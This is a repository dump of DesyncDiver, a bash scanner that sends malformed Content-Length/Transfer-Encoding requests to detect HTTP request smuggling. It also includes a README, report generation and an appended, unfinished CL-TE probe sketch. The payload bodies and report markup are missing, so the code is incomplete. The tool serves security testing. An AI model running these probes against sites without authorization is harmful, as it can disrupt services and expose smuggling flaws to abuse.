├── LICENSE ├── README.md └── desyncdiver.sh /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 Jonas Resch 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DesyncDiver 2 | 3 | **Active HTTP Desynchronization Vulnerability Scanner** 4 | 5 | ``` 6 | ██████╗ ███████╗███████╗██╗ ██╗███╗ ██╗ ██████╗██████╗ ██╗██╗ ██╗███████╗██████╗ 7 | ██╔══██╗██╔════╝██╔════╝╚██╗ ██╔╝████╗ ██║██╔════╝██╔══██╗██║██║ ██║██╔════╝██╔══██╗ 8 | ██║ ██║█████╗ ███████╗ ╚████╔╝ ██╔██╗ ██║██║ ██║ ██║██║██║ ██║█████╗ ██████╔╝ 9 | ██║ ██║██╔══╝ ╚════██║ ╚██╔╝ ██║╚██╗██║██║ ██║ ██║██║╚██╗ ██╔╝██╔══╝ ██╔══██╗ 10 | ██████╔╝███████╗███████║ ██║ ██║ ╚████║╚██████╗██████╔╝██║ ╚████╔╝ ███████╗██║ ██║ 11 | ╚═════╝ ╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═══╝ ╚═════╝╚═════╝ ╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝ 12 | ``` 13 | 14 | DesyncDiver is a bash-based tool for detecting HTTP Request Smuggling (Desynchronization) vulnerabilities in web servers and proxy chains. It actively tests targets by sending specially crafted HTTP requests designed to identify parsing inconsistencies between front-end and back-end servers. 15 | 16 | ## Features 17 | 18 | - **Advanced Payload Generation**: Creates and sends specially formatted HTTP requests that test for various desynchronization vulnerabilities 19 | - **Multiple Vulnerability Detection**: Tests for CL-TE, TE-CL, TE-TE, CL-CL and other header-based HTTP request smuggling vectors 20 | - **Detailed Reporting**: Generates comprehensive HTML reports with findings, recommendations, and technical details 21 | - **Flexible Configuration**: Customize headers, cookies, HTTP methods, and other parameters to suit your testing needs 22 | 23 | ## Installation 24 | 25 | DesyncDiver requires the following dependencies: 26 | - bash 27 | - curl 28 | - netcat (nc) 29 | - openssl 30 | - sed 31 | - grep 32 | - awk 33 | 34 | Most Linux distributions have these tools pre-installed. 
If not, you can install them using your package manager: 35 | 36 | ```bash 37 | # For Debian/Ubuntu 38 | sudo apt-get install bash curl netcat-openbsd openssl sed grep gawk 39 | 40 | # For RHEL/CentOS/Fedora 41 | sudo dnf install bash curl nc openssl sed grep gawk 42 | ``` 43 | 44 | To install DesyncDiver: 45 | 46 | ```bash 47 | # Clone the repository 48 | git clone https://github.com/reschjonas/DesyncDiver.git 49 | 50 | # Navigate to the directory 51 | cd DesyncDiver 52 | 53 | # Make the script executable 54 | chmod +x desyncdiver.sh 55 | ``` 56 | 57 | ## Usage 58 | 59 | Basic usage: 60 | 61 | ```bash 62 | ./desyncdiver.sh -u https://example.com 63 | ``` 64 | 65 | Advanced usage with options: 66 | 67 | ```bash 68 | ./desyncdiver.sh -u https://example.com -v -t 15 -o ./my-results -p http://proxy:8080 -H "Authorization: Bearer token" -c "session=abc123" 69 | ``` 70 | 71 | ### Options 72 | 73 | | Option | Description | 74 | |--------|-------------| 75 | | `-u, --url <url>` | Target URL (required) | 76 | | `-o, --output <dir>` | Output directory for results (default: ./results) | 77 | | `-t, --timeout <seconds>` | Request timeout in seconds (default: 10) | 78 | | `-p, --proxy <proxy>` | Use proxy (format: http://host:port) | 79 | | `-c, --cookies <cookies>` | Cookies to include with requests | 80 | | `-H, --header <header>
` | Additional headers (can be used multiple times) | 81 | | `-m, --methods <methods>` | HTTP methods to test (default: GET,POST) | 82 | | `-v, --verbose` | Enable verbose output | 83 | | `-h, --help` | Display help message | 84 | 85 | ## Examples 86 | 87 | Test a single website with default options: 88 | ```bash 89 | ./desyncdiver.sh -u https://example.com 90 | ``` 91 | 92 | Test with verbose output and custom timeout: 93 | ```bash 94 | ./desyncdiver.sh -u https://example.com -v -t 15 95 | ``` 96 | 97 | Test with custom headers and cookies: 98 | ```bash 99 | ./desyncdiver.sh -u https://example.com -H "X-Custom-Header: Value" -c "session=abc123" 100 | ``` 101 | 102 | ## How It Works 103 | 104 | DesyncDiver works by: 105 | 106 | 1. Generating specially crafted HTTP requests with various header combinations 107 | 2. Testing Content-Length and Transfer-Encoding header inconsistencies 108 | 3. Analyzing server responses for anomalies or unexpected behaviors 109 | 4. Identifying potential desynchronization vulnerabilities based on response patterns 110 | 5. Generating detailed reports with findings and recommendations 111 | 112 | ## Security Considerations 113 | 114 | - **Authorization**: Always ensure you have proper authorization before testing any website 115 | - **Legal Implications**: Unauthorized testing may be illegal in many jurisdictions 116 | - **Impact**: HTTP Request Smuggling tests can potentially disrupt service operations 117 | 118 | ## License 119 | 120 | This project is licensed under the MIT License - see the LICENSE file for details. 
121 | 122 | ## Acknowledgments 123 | 124 | - Inspired by the research on HTTP Request Smuggling by [James Kettle (PortSwigger)](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) 125 | - Thanks to the security community for documenting these vulnerabilities 126 | -------------------------------------------------------------------------------- /desyncdiver.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # DesyncDiver - Active HTTP Desynchronization Tester 4 | # A tool for detecting HTTP Request Smuggling vulnerabilities 5 | 6 | # Text styling 7 | BOLD="\033[1m" 8 | RED="\033[0;31m" 9 | GREEN="\033[0;32m" 10 | YELLOW="\033[0;33m" 11 | BLUE="\033[0;34m" 12 | PURPLE="\033[0;35m" 13 | CYAN="\033[0;36m" 14 | NC="\033[0m" # No Color 15 | 16 | # Script configuration 17 | VERSION="1.0.0" 18 | DEFAULT_TIMEOUT=10 19 | DEFAULT_OUTPUT_DIR="./results" 20 | TEMP_DIR="/tmp/desyncdiver" 21 | 22 | # Function to display banner 23 | show_banner() { 24 | echo -e "${BLUE}${BOLD}" 25 | echo "██████╗ ███████╗███████╗██╗ ██╗███╗ ██╗ ██████╗██████╗ ██╗██╗ ██╗███████╗██████╗ " 26 | echo "██╔══██╗██╔════╝██╔════╝╚██╗ ██╔╝████╗ ██║██╔════╝██╔══██╗██║██║ ██║██╔════╝██╔══██╗" 27 | echo "██║ ██║█████╗ ███████╗ ╚████╔╝ ██╔██╗ ██║██║ ██║ ██║██║██║ ██║█████╗ ██████╔╝" 28 | echo "██║ ██║██╔══╝ ╚════██║ ╚██╔╝ ██║╚██╗██║██║ ██║ ██║██║╚██╗ ██╔╝██╔══╝ ██╔══██╗" 29 | echo "██████╔╝███████╗███████║ ██║ ██║ ╚████║╚██████╗██████╔╝██║ ╚████╔╝ ███████╗██║ ██║" 30 | echo "╚═════╝ ╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═══╝ ╚═════╝╚═════╝ ╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝" 31 | echo -e "${NC}" 32 | echo -e "${BOLD}HTTP Desynchronization Vulnerability Scanner v${VERSION}${NC}" 33 | echo -e "${YELLOW}Actively tests for HTTP Request Smuggling vulnerabilities${NC}\n" 34 | } 35 | 36 | # Function to display usage information 37 | show_usage() { 38 | echo -e "${BOLD}Usage:${NC}" 39 | echo -e " ${0} [options] -u " 40 | echo 41 | echo -e 
"${BOLD}Options:${NC}" 42 | echo -e " -u, --url <url> Target URL (required)" 43 | echo -e " -o, --output <dir> Output directory for results (default: ${DEFAULT_OUTPUT_DIR})" 44 | echo -e " -t, --timeout <seconds> Request timeout in seconds (default: ${DEFAULT_TIMEOUT})" 45 | echo -e " -p, --proxy <proxy> Use proxy (format: http://host:port)" 46 | echo -e " -c, --cookies <cookies> Cookies to include with requests" 47 | echo -e " -H, --header <header>
Additional headers (can be used multiple times)" 48 | echo -e " -m, --methods HTTP methods to test (default: GET,POST)" 49 | echo -e " -v, --verbose Enable verbose output" 50 | echo -e " -h, --help Display this help message" 51 | echo 52 | echo -e "${BOLD}Examples:${NC}" 53 | echo -e " ${0} -u https://example.com" 54 | echo -e " ${0} -u https://example.com -v -t 15 -o ./my-results" 55 | echo -e " ${0} -u https://example.com -H \"Authorization: Bearer token\" -c \"session=abc123\"" 56 | echo 57 | } 58 | 59 | # Function to validate URL 60 | validate_url() { 61 | local url=$1 62 | if [[ ! $url =~ ^https?:// ]]; then 63 | echo -e "${RED}Error: URL must start with http:// or https://${NC}" 64 | return 1 65 | fi 66 | return 0 67 | } 68 | 69 | # Function to create directory if it doesn't exist 70 | create_dir_if_not_exists() { 71 | local dir=$1 72 | if [[ ! -d "$dir" ]]; then 73 | mkdir -p "$dir" || { echo -e "${RED}Error: Could not create directory ${dir}${NC}"; return 1; } 74 | fi 75 | return 0 76 | } 77 | 78 | # Function to generate payload with different content-length/transfer-encoding combinations 79 | generate_payload() { 80 | local method=$1 81 | local url=$2 82 | local payload_type=$3 83 | local host=$(echo "$url" | sed -E 's|^https?://([^/]+).*|\1|') 84 | local path=$(echo "$url" | sed -E 's|^https?://[^/]+(/.*)?|\1|') 85 | path=${path:-/} 86 | 87 | case "$payload_type" in 88 | "cl-te") 89 | cat < "$payload_file" 194 | 195 | # Add custom headers 196 | if [[ -n "$additional_headers" ]]; then 197 | # Insert headers before the empty line 198 | sed -i '/^$/i '"$additional_headers"'' "$payload_file" 199 | fi 200 | 201 | # Add cookies 202 | if [[ -n "$cookies" ]]; then 203 | # Insert cookies before the empty line 204 | sed -i '/^$/i Cookie: '"$cookies"'' "$payload_file" 205 | fi 206 | 207 | local result_file="${TEMP_DIR}/response_${payload_type}.txt" 208 | 209 | if [[ "$verbose" == "true" ]]; then 210 | echo -e "${CYAN}[*] Sending ${payload_type} payload with 
${method}...${NC}" 211 | echo -e "${CYAN}[*] Payload:${NC}" 212 | cat "$payload_file" 213 | echo 214 | else 215 | echo -e "${CYAN}[*] Testing ${BOLD}${payload_type}${NC} ${CYAN}payload...${NC}" 216 | fi 217 | 218 | # Prepare proxy args 219 | local proxy_args="" 220 | if [[ -n "$proxy" ]]; then 221 | proxy_args="-x $proxy" 222 | fi 223 | 224 | # Send request using curl or netcat based on payload type 225 | local response_code 226 | local response_size 227 | 228 | if [[ $url == https://* ]]; then 229 | # For HTTPS, use openssl s_client with a timeout 230 | { timeout "$timeout" bash -c "cat '$payload_file'; sleep 1" | timeout "$timeout" openssl s_client -quiet -connect "${host}:${port}" > "$result_file" 2>/dev/null; } || true 231 | else 232 | # For HTTP, use netcat with a timeout 233 | { timeout "$timeout" bash -c "cat '$payload_file'; sleep 1" | timeout "$timeout" nc "$host" "$port" > "$result_file"; } || true 234 | fi 235 | 236 | # Record the baseline response for comparison 237 | if [[ ! 
-f "${TEMP_DIR}/baseline_response.txt" ]]; then 238 | local baseline_file="${TEMP_DIR}/baseline_response.txt" 239 | # Send a normal request to establish baseline 240 | if [[ $url == https://* ]]; then 241 | timeout "$timeout" curl -s -k "$url" > "$baseline_file" 242 | else 243 | timeout "$timeout" curl -s "$url" > "$baseline_file" 244 | fi 245 | local baseline_size=$(wc -c < "$baseline_file") 246 | echo -e "${BLUE}[*] Established baseline response: ${baseline_size} bytes${NC}" 247 | fi 248 | 249 | # Analyze response 250 | if [[ -s "$result_file" ]]; then 251 | response_code=$(grep -o "HTTP/[0-9.]* [0-9]*" "$result_file" | awk '{print $2}') 252 | response_size=$(wc -c < "$result_file") 253 | 254 | # Save detailed response to output directory 255 | cp "$result_file" "${output_dir}/${payload_type}_response.txt" 256 | 257 | # Extract server information to detect CDN/proxy 258 | local server_info=$(grep -E "Server:|X-Served-By:|Via:" "$result_file" | tr '\n' ' ') 259 | 260 | # Check for specific responses that indicate proper security handling 261 | local response_body="" 262 | if grep -q -e '^$' "$result_file"; then 263 | # Extract body content after the first empty line 264 | response_body=$(awk -v RS='^\r?\n$' 'NR==2{print}' "$result_file") 265 | else 266 | response_body=$(cat "$result_file") 267 | fi 268 | 269 | # Check for security responses that indicate proper handling 270 | local security_patterns=("broken chunked-encoding" "Bad Request" "Invalid Request" "line folding of header fields is not supported" "transfer-encoding header" "405 Not Allowed" "413 Payload Too Large" "400 Bad Request" "411 Length Required" "501 Not Implemented" "malformed" "invalid" "rejected" "length required" "too large" "not implemented" "not allowed") 271 | local is_security_response=false 272 | 273 | for pattern in "${security_patterns[@]}"; do 274 | if grep -q "$pattern" "$result_file"; then 275 | is_security_response=true 276 | break 277 | fi 278 | done 279 | 280 | # Check for 
CDN/proxy presence 281 | local cdn_patterns=("Varnish" "Fastly" "Cloudflare" "Akamai" "CloudFront" "cache" "CDN" "proxy") 282 | local has_cdn=false 283 | 284 | for pattern in "${cdn_patterns[@]}"; do 285 | if grep -i -q "$pattern" "$result_file"; then 286 | has_cdn=true 287 | break 288 | fi 289 | done 290 | 291 | # Analyze response 292 | if [[ -z "$response_code" ]]; then 293 | # No response code - could be a desync 294 | echo -e "${YELLOW}[!] ${BOLD}Unexpected response format${NC} ${YELLOW}for ${payload_type} payload${NC}" 295 | echo -e "${YELLOW}[!] This could indicate a desynchronization vulnerability${NC}" 296 | echo -e "${YELLOW}[!] Response size: ${response_size} bytes${NC}" 297 | if [[ "$has_cdn" == "true" ]]; then 298 | echo -e "${BLUE}[i] CDN detected: ${server_info}${NC}" 299 | echo -e "${BLUE}[i] This may be a false positive as CDNs often protect against request smuggling${NC}" 300 | return 1 # Likely a false positive 301 | fi 302 | return 0 # Potential vulnerability 303 | elif [[ "$response_code" == "40"* || "$response_code" == "50"* ]]; then 304 | # Error response - could be good or bad depending on context 305 | if [[ "$is_security_response" == "true" ]]; then 306 | echo -e "${BLUE}[-] Security response: HTTP ${response_code} - Proper handling of malformed request${NC}" 307 | echo -e "${BLUE}[-] This indicates the server is correctly rejecting invalid requests${NC}" 308 | return 1 # Not a vulnerability 309 | else 310 | # Check for known false positive patterns 311 | if [[ "$has_cdn" == "true" && ("$response_code" == "400" || "$response_code" == "405" || "$response_code" == "413") ]]; then 312 | echo -e "${BLUE}[-] CDN protection: HTTP ${response_code} - ${server_info}${NC}" 313 | return 1 # Not a vulnerability 314 | else 315 | echo -e "${GREEN}[+] ${BOLD}Potential vulnerability detected${NC} ${GREEN}with ${payload_type} payload${NC}" 316 | echo -e "${GREEN}[+] Response code: ${response_code}, Size: ${response_size} bytes${NC}" 317 | return 0 # 
Potential vulnerability 318 | fi 319 | fi 320 | elif [[ "$response_code" == "20"* ]]; then 321 | # Successful response - check if suspicious 322 | if [[ "$payload_type" == "cl-te" || "$payload_type" == "te-cl" ]]; then 323 | # It's suspicious if malformed requests get 200 OK 324 | echo -e "${GREEN}[+] ${BOLD}Suspicious behavior:${NC} ${GREEN}Malformed ${payload_type} request got HTTP 200${NC}" 325 | echo -e "${GREEN}[+] This may indicate a desynchronization vulnerability${NC}" 326 | return 0 # Potential vulnerability 327 | else 328 | echo -e "${BLUE}[-] Normal response: HTTP ${response_code} (${response_size} bytes)${NC}" 329 | return 1 # No vulnerability detected 330 | fi 331 | else 332 | echo -e "${BLUE}[-] Normal response: HTTP ${response_code} (${response_size} bytes)${NC}" 333 | return 1 # No vulnerability detected 334 | fi 335 | else 336 | echo -e "${RED}[!] ${BOLD}No response received${NC} ${RED}for ${payload_type} payload${NC}" 337 | echo -e "${RED}[!] This could indicate a connection timeout, server timeout, or desynchronization${NC}" 338 | # For te-te payload, timeouts may indicate vulnerability but could also be network issues 339 | if [[ "$payload_type" == "te-te" ]]; then 340 | echo -e "${YELLOW}[!] 
Connection hung with ${BOLD}${payload_type}${NC} ${YELLOW}payload - requires manual verification${NC}" 341 | # Create empty response file to note the timeout 342 | echo "CONNECTION TIMED OUT - Requires manual verification" > "${output_dir}/${payload_type}_response.txt" 343 | return 1 # Mark as needing verification, not automatically a vulnerability 344 | fi 345 | return 2 # Error 346 | fi 347 | } 348 | 349 | # Function to create HTML report 350 | create_report() { 351 | local output_dir=$1 352 | local target_url=$2 353 | local report_file="${output_dir}/desyncdiver_report.html" 354 | local vulnerable_payloads=$3 355 | local timestamp=$(date "+%Y-%m-%d %H:%M:%S") 356 | 357 | # Extract server information if available 358 | local server_info="" 359 | for payload_type in "${payload_types[@]}"; do 360 | local response_file="${output_dir}/${payload_type}_response.txt" 361 | if [[ -f "$response_file" ]]; then 362 | server_info=$(grep -E "Server:|X-Served-By:|Via:" "$response_file" | head -n 1) 363 | if [[ -n "$server_info" ]]; then 364 | break 365 | fi 366 | fi 367 | done 368 | 369 | # Check for CDN/proxy 370 | local cdn_detected="" 371 | if grep -q -E "Varnish|Fastly|Cloudflare|Akamai|CloudFront|cache|CDN|proxy" <(echo "$server_info"); then 372 | cdn_detected="CDN/proxy detected: $(echo "$server_info" | tr -d '\n')" 373 | fi 374 | 375 | # Generate the HTML report 376 | cat > "$report_file" < 378 | 379 | 380 | 381 | 382 | DesyncDiver - HTTP Desynchronization Scan Report 383 | 480 | 481 | 482 |
483 |

DesyncDiver Scan Report

484 |

HTTP Desynchronization Vulnerability Scanner

485 |
486 | 487 |
488 |

Scan Summary

489 | 490 | 491 | 492 | 493 | 494 | 495 | 496 | 497 | 498 | 499 | 500 | 501 | 502 | 503 | 504 | 505 | 506 | 507 | 508 | 509 | 510 |
Target URL${target_url}
Scan Date${timestamp}
Vulnerabilities Found$(echo "$vulnerable_payloads" | wc -l)
Server Information${server_info:-Unknown}
CDN/Proxy${cdn_detected:-None detected}
511 | 512 |
513 |

About HTTP Desynchronization: HTTP Request Smuggling (also known as desynchronization) is a technique for interfering with the way a website processes HTTP request sequences. It occurs when front-end and back-end systems interpret HTTP headers differently, allowing attackers to "smuggle" requests to the back-end server.

514 |

False Positives: Modern CDNs and security systems often implement protections that can trigger responses similar to vulnerable servers. This report attempts to distinguish between real vulnerabilities and proper security responses.

515 |
516 |
517 | 518 |

Findings

519 | EOF 520 | 521 | # If no vulnerabilities found 522 | if [[ -z "$vulnerable_payloads" ]]; then 523 | cat >> "$report_file" < 525 |

No HTTP Desynchronization Vulnerabilities Detected

526 |

The target appears to be properly handling HTTP request headers and does not show signs of HTTP request smuggling vulnerabilities based on the tests performed.

527 | 528 |
529 |

Security Analysis: The target responded appropriately to malformed and malicious HTTP requests, indicating proper header validation and handling.

530 | EOF 531 | # If CDN detected, add specific note 532 | if [[ -n "$cdn_detected" ]]; then 533 | cat >> "$report_file" <CDN Protection: The target appears to be behind a CDN or proxy which provides additional protection against HTTP request smuggling attacks. CDNs typically implement strict HTTP parsing rules that prevent desynchronization attacks.

535 | EOF 536 | fi 537 | 538 | cat >> "$report_file" < 540 |
541 | EOF 542 | else 543 | # Add each vulnerability 544 | while IFS= read -r payload_type; do 545 | response_file="${output_dir}/${payload_type}_response.txt" 546 | response_content=$(cat "$response_file" | sed 's/</\&lt;/g; s/>/\&gt;/g') 547 | 548 | # Extract response code 549 | response_code=$(grep -o "HTTP/[0-9.]* [0-9]*" "$response_file" | awk '{print $2}') 550 | 551 | # Determine if this is likely a false positive 552 | is_false_positive=false 553 | if grep -q -i -E "Varnish|Fastly|Cloudflare|Akamai|CloudFront|cache|CDN|proxy" "$response_file"; then 554 | if grep -q -E "broken chunked-encoding|Bad Request|Invalid Request|line folding|405 Not Allowed|413 Payload" "$response_file"; then 555 | is_false_positive=true 556 | fi 557 | fi 558 | 559 | # Determine severity 560 | severity="medium" 561 | if [[ "$payload_type" == "cl-te" || "$payload_type" == "te-cl" ]]; then 562 | severity="high" 563 | elif [[ "$payload_type" == "cl-cl" || "$payload_type" == "te-te" ]]; then 564 | severity="medium" 565 | else 566 | severity="low" 567 | fi 568 | 569 | # Adjust severity if it's likely a false positive 570 | if [[ "$is_false_positive" == "true" ]]; then 571 | severity="low" 572 | fi 573 | 574 | cat >> "$report_file" < 576 |

Potential HTTP Desynchronization Vulnerability: ${payload_type}

577 |

Severity: $(echo "$severity" | sed 's/./\u&/')

578 |

Description: The server showed unexpected behavior when handling the ${payload_type} payload, which suggests it may be vulnerable to HTTP Request Smuggling attacks.

579 | 580 |

Technical Details

581 |

This vulnerability occurs when front-end and back-end servers interpret HTTP headers differently, allowing attackers to "smuggle" requests to the back-end server.

582 | EOF 583 | 584 | # Add false positive warning if applicable 585 | if [[ "$is_false_positive" == "true" ]]; then 586 | cat >> "$report_file" < 588 |

Possible False Positive: The response indicates this may be a security feature rather than a vulnerability. The server is correctly rejecting malformed requests with appropriate error codes, which is the expected behavior for secure systems.

589 | 590 | EOF 591 | fi 592 | 593 | # Add specific details based on payload type 594 | case "$payload_type" in 595 | "cl-te") 596 | cat >> "$report_file" < 598 |

CL-TE Attack Vector: This attack occurs when the front-end server uses the Content-Length header but the back-end server uses the Transfer-Encoding header. This specific test uses a chunked body that would be interpreted differently depending on which header is honored.

599 | 600 | EOF 601 | ;; 602 | "te-cl") 603 | cat >> "$report_file" < 605 |

TE-CL Attack Vector: This attack occurs when the front-end server uses the Transfer-Encoding header but the back-end server uses the Content-Length header. The conflicting headers can cause request desynchronization.

606 | 607 | EOF 608 | ;; 609 | "te-te") 610 | cat >> "$report_file" < 612 |

TE-TE Attack Vector: This attack uses duplicate or obfuscated Transfer-Encoding headers that may be processed differently by different servers. Some servers may honor only the first or the last header, leading to desynchronization.

613 | 614 | EOF 615 | ;; 616 | "cl-cl") 617 | cat >> "$report_file" < 619 |

CL-CL Attack Vector: This attack uses duplicate Content-Length headers with different values. If front-end and back-end servers honor different instances of the header, it can lead to request smuggling.

620 | 621 | EOF 622 | ;; 623 | esac 624 | 625 | cat >> "$report_file" <Server Response 627 |
${response_content}
628 | 629 |

Recommendations

630 |
    631 |
  • Ensure consistent HTTP header parsing across all servers in the chain
  • 632 |
  • Validate and sanitize all headers, especially Content-Length and Transfer-Encoding
  • 633 |
  • Consider implementing strict HTTP parsing rules
  • 634 |
  • Update web servers and proxies to the latest versions
  • 635 | EOF 636 | 637 | # Add CDN recommendation if no CDN detected 638 | if ! grep -q -i -E "Varnish|Fastly|Cloudflare|Akamai|CloudFront|cache|CDN|proxy" "$response_file"; then 639 | cat >> "$report_file" <Consider using a CDN or Web Application Firewall that provides protection against HTTP request smuggling 641 | EOF 642 | fi 643 | 644 | cat >> "$report_file" < 646 | 647 | EOF 648 | done <<< "$vulnerable_payloads" 649 | fi 650 | 651 | # Close the HTML 652 | cat >> "$report_file" < 654 |

    Generated by DesyncDiver v${VERSION} | ${timestamp}

    655 | 656 | 657 | 658 | EOF 659 | 660 | echo -e "${GREEN}[+] Report generated: ${report_file}${NC}" 661 | } 662 | 663 | # Main function 664 | main() { 665 | # Default values 666 | local url="" 667 | local output_dir="$DEFAULT_OUTPUT_DIR" 668 | local timeout="$DEFAULT_TIMEOUT" 669 | local proxy="" 670 | local cookies="" 671 | local headers="" 672 | local methods="GET,POST" 673 | local verbose=false 674 | 675 | # Parse command-line arguments 676 | while [[ $# -gt 0 ]]; do 677 | case "$1" in 678 | -u|--url) 679 | url="$2" 680 | shift 2 681 | ;; 682 | -o|--output) 683 | output_dir="$2" 684 | shift 2 685 | ;; 686 | -t|--timeout) 687 | timeout="$2" 688 | shift 2 689 | ;; 690 | -p|--proxy) 691 | proxy="$2" 692 | shift 2 693 | ;; 694 | -c|--cookies) 695 | cookies="$2" 696 | shift 2 697 | ;; 698 | -H|--header) 699 | headers="${headers}${2}\n" 700 | shift 2 701 | ;; 702 | -m|--methods) 703 | methods="$2" 704 | shift 2 705 | ;; 706 | -v|--verbose) 707 | verbose=true 708 | shift 709 | ;; 710 | -h|--help) 711 | show_banner 712 | show_usage 713 | exit 0 714 | ;; 715 | *) 716 | echo -e "${RED}Error: Unknown option: $1${NC}" 717 | show_usage 718 | exit 1 719 | ;; 720 | esac 721 | done 722 | 723 | # Show banner 724 | show_banner 725 | 726 | # Check required arguments 727 | if [[ -z "$url" ]]; then 728 | echo -e "${RED}Error: URL is required${NC}" 729 | show_usage 730 | exit 1 731 | fi 732 | 733 | # Validate URL 734 | validate_url "$url" || exit 1 735 | 736 | # Create output directory 737 | create_dir_if_not_exists "$output_dir" || exit 1 738 | 739 | # Create temporary directory 740 | create_dir_if_not_exists "$TEMP_DIR" || exit 1 741 | 742 | echo -e "${BLUE}[*] Target: ${BOLD}${url}${NC}" 743 | echo -e "${BLUE}[*] Output directory: ${output_dir}${NC}" 744 | echo -e "${BLUE}[*] Starting scan...${NC}\n" 745 | 746 | # Define payload types to test 747 | local payload_types=("cl-te" "te-cl" "te-te" "cl-cl" "space-te" "crlf-te") 748 | 749 | # List to store vulnerable payload types 
750 | local vulnerable_payloads="" 751 | 752 | # Counter for real vulnerabilities vs false positives 753 | local potential_vulns=0 754 | 755 | # Check for CDN/WAF first 756 | local has_cdn=false 757 | local cdn_info="" 758 | 759 | echo -e "${BLUE}[*] Checking for CDN/WAF protection...${NC}" 760 | local headers_file="${TEMP_DIR}/headers.txt" 761 | if [[ $url == https://* ]]; then 762 | curl -s -I -k "$url" > "$headers_file" 763 | else 764 | curl -s -I "$url" > "$headers_file" 765 | fi 766 | 767 | if grep -q -i -E "Varnish|Fastly|Cloudflare|Akamai|CloudFront|cache|CDN|proxy|WAF" "$headers_file"; then 768 | has_cdn=true 769 | cdn_info=$(grep -E "Server:|X-Served-By:|Via:|CF-RAY:|X-Cache:|X-Powered-By:" "$headers_file" | tr '\n' ' ') 770 | echo -e "${BLUE}[*] CDN/WAF detected: ${BOLD}${cdn_info}${NC}" 771 | echo -e "${YELLOW}[!] Note: CDNs/WAFs often provide protection against HTTP desync attacks${NC}" 772 | else 773 | echo -e "${YELLOW}[!] No CDN/WAF detected - site may be more vulnerable to desync attacks${NC}" 774 | fi 775 | echo 776 | 777 | # Process each HTTP method 778 | IFS=',' read -ra method_array <<< "$methods" 779 | for method in "${method_array[@]}"; do 780 | echo -e "${PURPLE}[*] Testing with HTTP method: ${BOLD}${method}${NC}" 781 | 782 | # Process each payload type 783 | for payload_type in "${payload_types[@]}"; do 784 | # Send payload and check for vulnerability 785 | if send_payload "$url" "$payload_type" "$method" "$timeout" "$proxy" "$headers" "$cookies" "$verbose" "$output_dir"; then 786 | vulnerable_payloads="${vulnerable_payloads}${payload_type}\n" 787 | ((potential_vulns++)) 788 | fi 789 | echo 790 | done 791 | done 792 | 793 | # Generate final report 794 | echo -e "${BLUE}[*] Scan completed. 
Generating report...${NC}" 795 | create_report "$output_dir" "$url" "$(echo -e "$vulnerable_payloads" | grep -v '^$')" 796 | 797 | # Cleanup temporary files 798 | rm -rf "$TEMP_DIR" 799 | 800 | echo -e "${GREEN}[+] Scan completed successfully!${NC}" 801 | 802 | # Show summary 803 | local vuln_count=$(echo -e "$vulnerable_payloads" | grep -v '^$' | wc -l) 804 | if [[ $vuln_count -gt 0 ]]; then 805 | if [[ "$has_cdn" == "true" ]]; then 806 | echo -e "${YELLOW}[!] ${BOLD}${vuln_count} potential issues detected, but may include false positives${NC}" 807 | echo -e "${YELLOW}[!] Target is protected by a CDN/WAF which reduces the risk${NC}" 808 | else 809 | echo -e "${RED}[!] ${BOLD}${vuln_count} potential vulnerabilities detected!${NC}" 810 | fi 811 | echo -e "${YELLOW}[!] Check the detailed report for analysis: ${output_dir}/desyncdiver_report.html${NC}" 812 | else 813 | echo -e "${GREEN}[+] No HTTP desynchronization vulnerabilities detected.${NC}" 814 | if [[ "$has_cdn" == "true" ]]; then 815 | echo -e "${GREEN}[+] Target is well-protected by CDN/WAF: ${cdn_info}${NC}" 816 | fi 817 | fi 818 | } 819 | 820 | # Check dependencies 821 | check_dependencies() { 822 | local missing_deps=() 823 | 824 | # Check for required tools 825 | for cmd in curl nc openssl sed grep awk wc timeout; do 826 | if ! command -v "$cmd" &>/dev/null; then 827 | missing_deps+=("$cmd") 828 | fi 829 | done 830 | 831 | if [[ ${#missing_deps[@]} -gt 0 ]]; then 832 | echo -e "${RED}Error: Missing dependencies: ${missing_deps[*]}${NC}" 833 | echo -e "${YELLOW}Please install the required dependencies and try again.${NC}" 834 | exit 1 835 | fi 836 | } 837 | 838 | # Run dependency check 839 | check_dependencies 840 | 841 | # Run the main function with all arguments passed to the script 842 | main "$@" --------------------------------------------------------------------------------
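
The heredoc bodies of `generate_payload` (script lines 90–193) did not survive this dump, but the CL-TE technique the script tests is well documented: pair a Content-Length header with a conflicting chunked Transfer-Encoding body, so a front end honoring Content-Length and a back end honoring Transfer-Encoding disagree about where the request ends. The sketch below illustrates that layout with a hypothetical helper (`build_cl_te_payload` is not a function from the script, and the exact payload DesyncDiver generates may differ):

```shell
#!/bin/bash
# Sketch of a CL-TE-style probe builder. Hypothetical helper, not the
# script's own generate_payload; the header/body layout follows the
# classic CL-TE pattern.
build_cl_te_payload() {
  local host=$1 path=${2:-/}
  # Raw HTTP/1.1 requires CRLF line endings, hence printf with \r\n.
  printf 'POST %s HTTP/1.1\r\n' "$path"
  printf 'Host: %s\r\n' "$host"
  printf 'Content-Length: 6\r\n'
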